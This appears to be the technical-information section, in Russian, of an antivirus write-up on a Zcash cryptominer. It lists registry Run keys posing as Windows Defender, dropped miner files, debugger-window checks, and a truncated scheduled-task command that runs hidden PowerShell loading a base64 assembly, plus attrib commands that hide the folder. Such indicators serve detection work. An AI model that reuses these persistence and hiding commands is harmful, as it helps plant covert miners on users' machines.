Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsDefenderTasksupport' = '%APPDATA%\sgm\son.bat'
- ClassName: 'OLLYDBG', WindowName: ''
- ClassName: 'OLLYDBG', WindowName: 'OllyDBg'
- %APPDATA%\sgm\sgvhosts.exe
- %APPDATA%\sgm\son.bat
- %APPDATA%\sgm\nircmd.exe
- %APPDATA%\sgm\sgminerzcash.conf
- %APPDATA%\sgm\equihash-param.h
- %APPDATA%\sgm\equihash.cl
- %TEMP%\tmp1.tmp.bat
- %TEMP%\tmp1.tmp.bat
- ClassName: 'ObsidianGUI' WindowName: ''
- ClassName: 'WinDbgFrameClass' WindowName: ''
- ClassName: 'ID' WindowName: ''
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 2 /tn "WindowsDefenderTasksgm" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64Strin...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp1.tmp.bat" "
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgm
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgm\*